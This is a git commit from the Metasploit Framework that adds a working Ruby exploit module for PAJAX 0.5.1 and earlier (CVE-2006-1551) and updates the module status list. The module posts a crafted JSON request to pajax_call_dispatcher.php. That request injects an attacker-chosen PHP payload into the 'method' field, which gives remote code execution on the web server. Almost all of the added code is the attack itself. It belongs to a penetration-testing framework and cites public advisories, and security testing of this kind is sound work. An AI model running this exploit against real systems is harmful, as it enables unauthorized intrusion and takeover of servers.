Added the PAJAX exploit

git-svn-id: file:///home/svn/framework3/trunk@4261 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-01-05 05:38:28 +00:00
parent 0f88005df8
commit 752cc9f978
2 changed files with 70 additions and 1 deletions

View File

@ -13,7 +13,6 @@ Unfinished modules
lyris_attachment_mssql
mailenable_auth_header
mcafee_epolicy_source
pajax_remote_exec
php_wordpress_lastpost
phpbb_highlight
phpnuke_search_module
@ -119,6 +118,7 @@ Completed modules
oracle9i_xdb_ftp exploit/windows/ftp/oracle9i_xdb_ftp_unlock
oracle9i_xdb_ftp_pass exploit/windows/ftp/oracle9i_xdb_ftp_pass
oracle9i_xdb_http exploit/windows/http/oracle9i_xdb_pass
pajax_remote_exec exploit/unix/webapp/pajax_remote_exec
payload_handler exploit/multi/handler
peercast_url_linux exploit/linux/http/peercast_url
peercast_url_win32 exploit/windows/http/peercast_url

View File

@ -0,0 +1,69 @@
require 'msf/core'
module Msf
class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PAJAX Remote Command Execution',
'Description' => %q{
RedTeam has identified two security flaws in PAJAX (<= 0.5.1).
It is possible to execute arbitrary PHP code from unchecked user input.
Additionally, it is possible to include arbitrary files on the server
ending in ".class.php".
},
'Authors' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3509 $',
'References' =>
[
['OSVDB', '24618'],
['BID', '17519'],
['CVE', '2006-1551'],
['URL', 'http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php'],
['MIL', '1672'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 4000,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 30 2006',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to pajax_call_dispatcher.php", "/pajax/pajax/pajax_call_dispatcher.php"]),
OptString.new('MOD', [true, "The PAJAX module name", "Calculator"])
], self.class)
end
def exploit
args = %Q!{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "#{datastore['MOD']}", "method": "add(1,1);#{payload.encoded};$obj->add", "params": ["1", "5"] }!
res = send_request_cgi({
'uri' => datastore['URI'],
'method' => 'POST',
'data' => args,
'ctype' => 'text/x-json'
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
else
print_status("No response from the server")
end
end
end
end